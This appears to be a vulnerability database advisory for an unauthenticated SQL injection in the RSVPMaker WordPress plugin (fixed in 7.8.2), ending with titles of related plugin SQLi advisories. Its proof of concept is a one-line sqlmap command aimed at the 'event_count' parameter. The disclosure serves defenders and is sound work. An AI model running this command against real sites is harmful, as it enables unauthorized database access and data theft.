RSVPMaker < 7.8.2 – Unauthenticated SQL Injection

Description

The plugin does not sanitise user input before using it in a SQL statement in the signed_up_ajax() AJAX action.

Note: Even though the reported SQL Injection was fixed in v7.8.2, other additional sanitisation was implemented in v7.8.3 to 7.8.6.

Proof of Concept

sqlmap -u "https://localhost/?action=signed_up&event_count=1" --dbms mysql -p event_count --technique T

Affects Plugins

rsvpmaker

Fixed in 7.8.2

References

URL

https://github.com/CBiu/wp-plugins-vuln/blob/master/SQLi/rsvpmaker.md

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

9.4 (critical)

Miscellaneous

Original Researcher

CBiu

Submitter

CBiu

Submitter website

https://www.cbiu.cc

Verified

WPVDB ID

7abffced-fa65-4cea-945a-3e67cd12c373

Timeline

Publicly Published

2020-08-22 (about 5 years ago)

Added

2020-08-22 (about 5 years ago)

Last Updated

2020-08-23 (about 5 years ago)

Other

Published

Title

Published

2022-12-12

Title

Web Invoice <= 2.1.3 - Authenticated SQLi

Published

2025-06-16

Title

Blog2Social < 8.4.5 - Authenticated (Subscriber+) SQL Injection via `prgSortPostType` Parameter

Published

2025-02-24

Title

FS Poster < 6.5.9 - Subscriber+ SQL Injection

Published

2021-12-21

Title

Asgaros Forum < 1.15.15 - Admin+ SQL Injection via forum_id

Published

2023-11-20

Title

EazyDocs < 2.3.4 - Subscriber + SQLi